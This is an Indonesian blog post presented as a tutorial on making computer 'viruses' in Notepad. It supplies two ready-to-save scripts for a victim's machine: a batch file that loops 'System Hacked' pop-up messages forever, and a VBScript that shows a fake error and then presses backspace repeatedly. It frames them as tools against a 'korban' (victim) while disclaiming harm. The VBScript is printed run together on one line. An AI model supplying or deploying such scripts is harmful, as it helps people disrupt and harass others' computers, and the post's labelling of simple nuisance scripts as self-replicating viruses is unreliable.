-->

follow us

CARA MEMBUAT BERBAGAI MACAM VIRUS UNTUK KOMPUTER DENGAN NOTEPAD

Hasil gambar untuk gambar virus komputer
Selamat datang di Akira Blog sahabat Blogger, Pada kali ini saya admin Akira Blog akan membagikan tutorial cara membuat virus untuk komputer. Ada beberapa cara untuk membuat virus untuk komputer ini, dan akan dibahas dibawah. Virus yang akan dibuat kali ini bervariasi, ada yang tidak berbahaya dan ada yang sangat berbahaya. Ini adalah penjelasannya.

Di dunia maya ataupun dunia IT pasti tidak lepas dari yang namanya virus. virus diciptakan dari bahasa pemrograman yang bermacam-macam. Banyak orang berfikir virus itu diciptakan oleh penyedia jasa antivirus untuk meraih keuntungan semata, tetapi tidak semua jasa penyedia antivirus itu yang membuat virus.

Virus tidak dengan tiba-tiba berada di komputer kita. Virus ada di komputer kita itu karena kecerobohan kita sendiri yang tidak berhati-hati dalam menggunakan komputer untuk dunia maya.
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri  dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Setelah anda mengetahui lebih jauh tentang virus komputer apakah anda pernah berfikir untuk membuat virus komputer ? Jika anda ingin mencoba untuk membuat virus, saya sarankan untuk tidak main-main dan tidak untuk mencelakakan orang lain. Virus yang akan kita buat kali ini dapat dibuat menggunakan notepad. Dan Ingat !!! jangan membuat virus ini untuk mencelakakan orang lain. Berikut ini adalah caranya :

1. CARA MEMBUAT VIRUS KOMPUTER UNTUK MEMUNCULKAN PESAN (POOP UP) TERUS      MENERUS
Virus yang satu ini system kerjanya adalah dengan memunculkan pesan(poop up) yang terus menerus dan tidak ada batasannya. salah satunya cara untuk menghentikan virus ini adalah dengan cara merestart komputer korban. Salinlah syntax berikut ini kedalam notepad anda.

@echo off
:Loop1
msg * System Hacked!
msg * You are so *****!
msg * The system will automatically remove your OS
msg * Hacked By Ngelmu Tekno
GOTO Loop1

Dan simpanlah syntax tersebut kedalam notepad anda dengan nama sesuka anda dan dengan menggunakan ekstensi .BAT atau .vbs

2. CARA MEMBUAT VIRUS KOMPUTER ERROR BACKSPACE
Virus ini sesuai dengan namanya yaitu membuat error tombol backspace pada komputer korban dan akan menekan tombol backspace secara terus menerus.
Untuk membuat virus ini silahkan salin syntax dibawah ini.

MsgBox "Error when typing!!"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys 
"{bs}"loop

Dan simpanlah syntax tersebut kedalam notepad dengan nama sesuka anda dan dengan ekstensi .vbs dan pada pilihan file pilih All file.

Demikianlah tutorial dari saya, dan saya ingatkan untuk tidak pernah mencoba virus tersebut di komputer anda, karena virus tersebut sangat berbahaya.
Artikel ini saya buat hanya untuk pembelajaran saja, dan jangan sampai anda gunakan virus ini untuk mencelakakan orang lain !! karena apabila ada suatu kecerobohan yang terjadi di komputer anda kami selaku pengurus blog ini tidak bertanggung jawab !!

You Might Also Like: